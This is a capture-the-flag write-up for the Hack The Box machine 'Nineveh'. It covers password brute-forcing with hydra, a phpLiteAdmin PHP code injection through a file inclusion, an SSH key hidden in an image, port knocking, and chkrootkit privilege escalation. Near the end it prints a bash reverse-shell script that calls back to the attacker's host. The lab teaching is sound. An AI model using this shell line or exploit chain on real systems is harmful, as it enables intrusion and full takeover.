Nineveh is a medium-rated box based on the phpLiteAdmin 1.9(.3) vulnerability. This vulnerability allows the attacker to interact with the phpLiteAdmin database of the box on its HTTPS, upload malicious php, execute those php files and accessing the created php files by file inclusion on the box’s non-SSL HTTP. Let’s get right to it.
We can see only HTTP Protocol ports are open, HTTP and HTTPS, let’s jump right over to the HTTP site.
I can see a domain in the HTTPS port 443 scan report (nineveh.htb), so I’ll add this domain to the /etc/hosts file.
As we enter the IP in the URL we are prompted to a “It works!” page. Now we’re going to run a gobuster.
I added the php extension because the gobuster found an info.php page and I realized this site might run php pages. I added the txt extension to find any special hidden .txt files as robots.txt, secret.txt, etc.
gobuster found the department dir, I went to check it out and it prompted me to a login page.
Checking the page source I found this comment :
“<! — @admin! MySQL is been installed.. please fix the login page! ~amroid →”
Okay looks like we have 2 usernames — admin, amrois. Trying to log in with amrois username tells me the username is not valid, trying it with admin with incorrect password tells me only the password isn’t valid. So for this login page I’m going to try to log in as admin because it is a valid username.
I tried to perform different SQL injections on the login prompt but it is not vulnerable to SQL injection. The comment subject might be a rabbithole of SQL Injection.
I ran hydra to try to brute the admin user and got credentials for admin!
We got login creds = admin : 1a2w3e4r5t .
Logging in we see this page :
Exploring to the ‘Notes’ tab shows an exposed file inclusion in the URL :
We can assume there’s a “files” folder in our current pwd, and it reads the ‘ninevehNotes.txt’ file inside of it. We try to include ‘../../../../../etc/passwd’ but it doesn’t seem to work.
We enter the SSL site and it prompts us to an image. Trying to perform steganography techniques on the downloaded image, but there’s nothing special there, it’s just an image.
Running a gobuster on the SSL page found an interesting dir.
Going to https://10.10.10.43/db/ prompts us to a phpLiteAdmin v1.9 authentication page.
I decided to use hydra on this page aswell.
Hydra found a password! (pretty basic, I could’ve guessed it) We now have a password for this page aswell : ‘password123’
At this point I’m starting to exploit the vulnerable version of the phpLiteAdmin with https://www.exploit-db.com/exploits/24044 ←this exploit = Remote PHP Code Injection.
Added a table with a value of a php code execution, naming the database we created ‘ninevehNotes.php’.
In the index page we can see that it shows the path to the database — /var/tmp/*database*. We use it on the HTTP site to gain command execution with the ‘&cmd=’ parameter.
I can see I successfully executed ‘id’ !
Now I download the shell from my local machine, I then rename it to ninevehNotes.php (replacing the cmd injection with an actual shell).
And we have a shell!
After we retrieved a shell, I entered the ‘ssl’ directory inside the /var/www dir, and found an interesting directory.
the secure_notes dir inside the /var/www/ssl directory looks interesting and I was entering it in the URL.
Entering https://10.10.10.43/secure_notes prompts us to an image, yet again I’m performing steganography techniques and I’ve found an ssh key using ‘strings’!
Beautiful. We copy it and name the file “id_rsa”, and head over to john to see if it has a passphrase which we can try to crack using john.
Perfect! John tells us there’s no password for this id_rsa, meaning we can use it to log in as the user it belongs to! But… ssh isn’t open.. (yet)
I switched to amrois using this id_rsa INSIDE the box.
We head over to /var/mail to see if someone has got any mail we can read and amrois does have mail! A very interesting one.
Ah! A reference to port knocking! Let’s try to open SSH with the “knock” command on our Kali machine!
We successfully opened port 22! We can now have a more stable direct SSH connection to amrois.
— — — — — — — — — — — -Privilege Escalation — — — — — — — — — — — -
Running pspy32 shows us root runs a LOT, of chkrootkit.
I try to use the chkrootkit version 0.49 privilege escalation exploit by creating a file named ‘update’ in the /tmp directory. What happens is, if this is the vulnerable version of chkrootkit, it runs (as root, as I’ve mentioned before) /tmp/update!
So I create a file named ‘update’ in the /tmp directory with the following:
#!/bin/bash
bash -c ‘bash -i >& /dev/tcp/10.10.14.**/51337 0>&1’
And I run a netcat listener on my kali machine listening on port 51337
And we’re root! An interesting and educating box, I’ve enjoyed it.
